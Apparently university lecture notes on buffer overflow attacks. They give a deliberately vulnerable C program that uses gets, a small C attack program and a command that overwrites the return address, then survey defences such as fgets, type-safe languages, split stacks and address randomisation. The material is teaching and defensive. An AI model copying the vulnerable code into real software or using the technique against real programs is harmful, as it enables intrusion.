Attacking The Return Address

Part of 22C:169, Computer Security Notes
by Douglas W. Jones
THE UNIVERSITY OF IOWA Department of Computer Science

A Completed Buffer Overflow Attack

The attack we demonstrated at the end of the previous lecture was really artificial. It involved a program attacking itself. What we really want to do is attack a program from outside by actually overflowing the buffer. Consider attacking this program:

/* victim */
#include <stdio.h>
#include <stdlib.h>
int getnum() {
        char buf[32];
        gets(buf);
        return atoi(buf);
}

void wrongplace() {
        printf("We got to the wrong place\n");
        exit(-1);
}

int main() {
        for (;;) {
                int i;
                i = getnum();
                printf("%d\n", i);
        }
}

This program does nothing interesting (it just outputs the same number that was provided as input, and it certainly doesn't cooperate by telling you the addresses of any of its entry points. In the worst case, an attack against this program might first determine that there is a buffer overflow vulnerability (by making the program crash on a long input string) and then use automated trial and error, based on a generic knowledge of where in memory the compilers on that system normally put user code.

Many compilers automatically include symbolic information about variable names and entry points of subroutines in their object code so that a debugger can be used to examine the code. For example, by default, the Gnu C compiler, gcc does so, and the Gnu debugger, gdb allows you to print out the entry points. Entering gdb debugger with the above victim program, the command print wrongplace gives, as output, exactly the same thing as is given by printit.

Of course, it's silly just to make the program jump to wrongplace, a dumb little subroutine that prints out its own name. What a real attacker would do is make the program being attacked jump to, for example, the routine it calls after checking the user's name and password.

We don't want to type the input string ourselves, of course, we wan to automate this. Here's an automated attacker:

/* the attack program */
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char * argv[]) {
        int i;
        long int addr;
        for (i = atoi(argv[1]); i > 0; i--) putchar(' ');
        addr = strtol(argv[2], NULL, 16);
        for (i = 0; i < sizeof(long int); i++) putchar(((char *)&addr)[i]);
        putchar('\n');
}

The command attack 8 012345678 puts out 8 spaces and then the address given in hex as 012345678 (but it puts it out as straight binary). The command attack 8 012345678 | victim sends the output of attack to the input of victim. On our Linux system, the command attack 40 4005fd successfully causes the victim program to transfer control to the wrong place.

Defending Against Buffer Overflow Attacks

Don't use vulnerable routines

The obvious answer to the question, how do you defend yourself against such an attack is: Don't write that kind of code. For example, never use gets. Most versions of the Unix programmer's reference manual say something like this:

When using gets, if the length of an input line exceeds the size of s, indeterminate behavior may result. For this reason, it is strongly recommended that gets be avoided in favor of fgets.

That is, replace gets(s) with fgets(s,SIZEOFS,stdin). The gets routine reads only from standard input and is not given any hints about the buffer size. In contrast, the fgets routine can read from any file, so you have to tell it which file, and it is given explicit information about the buffer length.

Unfortunately, because of the fault-prone semantics of arrays in C and C++, it is up to the programmer to tell fgets the array size. One way to suppress warnings about use of gets is to simply substitute fgets(s,10000,stdin) using a big number for the buffer size, since it's easier to pick big numbers out of thin air than it is to look up the declaration of the array and put in the right number.

The list of routines in the C library that create buffer overflow vulnerabilities is long. Among them are the strcat and strcpy routines in the strings library -- they concatenate and copy strings, using a buffer provided by the caller without knowing how long that buffer is. Again, alternative routines are available that take a buffer limit as a parameter, but again, it is up to the programmer to pass the correct value.

Don't use vulnerable languages

The gets routine in C can be trivially replaced with this equally unsafe code:

mygets( char * s ) { int ch; for (;;) { ch = getchar(); if (ch == EOF) break; if (ch == '\n') break; *s = ch; s++; } *s = '\0'; }

This code does exactly what gets does. Searching programs for code like this is extremely difficult. The code is easy to read, well formatted and passes most guidelines for C and C++ programming style (excepting the complete lack of comments). Only when you read it and discover how it actually works, descending below the level of style into substance do you see the danger is poses.

The solution, of course, is to abandon languages like C and C++ in favor of "type safe" languages such as Java and Python (or even Pascal, Ada and other type-safe languages of the 1970s). This poses two problems:

First, type safety prevents writing some system code. The most critical such piece of code is the memory manager that underlies the heap-based storage management used for dynamically created objects. Object instantiation in C++, Java and Python requires that there be such a memory manager. In the latter two languages, this memory manager is more complex than in C because it does garbage collection.

Second, type safety at the operating system interface is impossible with current operating systems. The problem is that the operating system interface itself is outside the control of the programming language designer. The system interface is designed by the operating system designer, frequently in terms of a programming environment quite different from that envisioned by the language designer.

As a result, calls to operating system services invariably involve calls outside the boundary of the programming language being used. So, programming language desingers generally include tools in their languages for calling external routines, sometimes called native routines. Java certainly includes such hooks. Every such call is inherently dangerous, and the dangers cannot be dealt with in any simple way.

Use Middleware

Instead of directly calling dangerous operating system calls, call them through an intermediate software layer. We do this all the time. Very few applications programs directly call read(0,&ch,1). Instead, C programmers call getchar() which, if very badly implemented, would be exactly equivalent to the call to the read. In fact, getchar is much better than this for several reasons, but the most important is that the call to read has exactly the same safety problems as fgets -- it requires the buffer length (one character, in this example) to be passed as a parameter separately from the pointer to the buffer.

The middleware layers supporting languages such as Java are so well developed that most programmers never see the actual operating system interface, but it is there. The disadvantages of these middleware layers is that they can add considerably to the size of programs, and that they can, if improperly used, considerably slow down applications. Typically, this occurs because programmers don't understand the computational cost of the middleware when they design the algorithms they're using.

A serious problem with large middleware packages is that the middleware itself grows so complex that nobody understands it. The middleware isolates users from the underlying system, so that they don't understand it either, and this leads programmers to develop new middleware layers that sit on top of the old middleware layers in order to present a reasonable and comprehensible applicatons programming interface. This leads to a house of cards phenomona, where tiny little applications sit atop tall towers of middleware, where the lower layers are poorly understood and have unknown vulnerabilities that have long since been forgotten by the user community.

Don't Help the Attacker

Avoid giving away information that the attacker might need. The debugging information that compilers, by default, include in their object files allows an attacker to easily find the subroutines that they might want to get into. Obviously, making the attacker do more work is a good way to slow down the attack. With the Gnu C compiler, there are a huge number of debugging options. These can be turned off, typically, by asking the compiler to optimize its output.

Patch the Unsafe Language

The easy buffer overflow attacks all attack return addresses on the stack, so one solution is to use a compiler that does everything it can to separate addresses from other data. There are several sets of patches to the Gnu C compiler, for example, that replace use of a single stack for local variables and return addresses with two stacks, one for local variables, and one used only for return addresses.

The price of this modificaton is an approximate doubling of the cost of subroutine entry. Where, formerly, there was just one stack-pointer register, there are now two, each of which gets incremented and decremented separately.

It's also possible to reorganize activation record structures in several ways. For example, pointer variables in the activation record can be carefully isolated from arrays. The language is still unsafe if arrays are not bounded, but by having the array storage separated from the stack used for other variables, buffer overflows will only damage other arrays.

Another option is to launch programs so that the code of the program runs at unpredictable addresses. If, each time a program is loaded from disk, it is relocated into a different memory address, selected at random, then a buffer overflow attack that relies on each routine being at a predictable address will fail. Buffer overflows can still create random damage, but it's much harder to create a predictable effect.

Each of these defenses is imperfect, but given the large volume of C and C++ code that is out in the world today, they can improve the situation by making that code harder to attack.

Other Sources of Information

There is a short tutorial on the Gnu debugger gdb on the web. It has links to an on-line reference card that contains, on one page, a useful summary of the debugger's commands. No doubt, Google can find other sources.

The Princeton GDB Tutorial

Unix programmers reference manual pages are available on most Unix and Linux systems using the man command. Type man man for the manual page on the man command, or type man gets to see what your system says about the gets command. These man pages are also spread all over the web. See, for example,

gets, fgets - get a string from a stream
gets or fgets Subroutine

The compiler options for GCC are extensive. They are all listed on-line:

Invoking GCC - Using the GNU Compiler Collection (GCC)

Here is a link to one interest web page on protecting GCC from these attacks:

GCC extension for protecting applications from stack-smashing attacks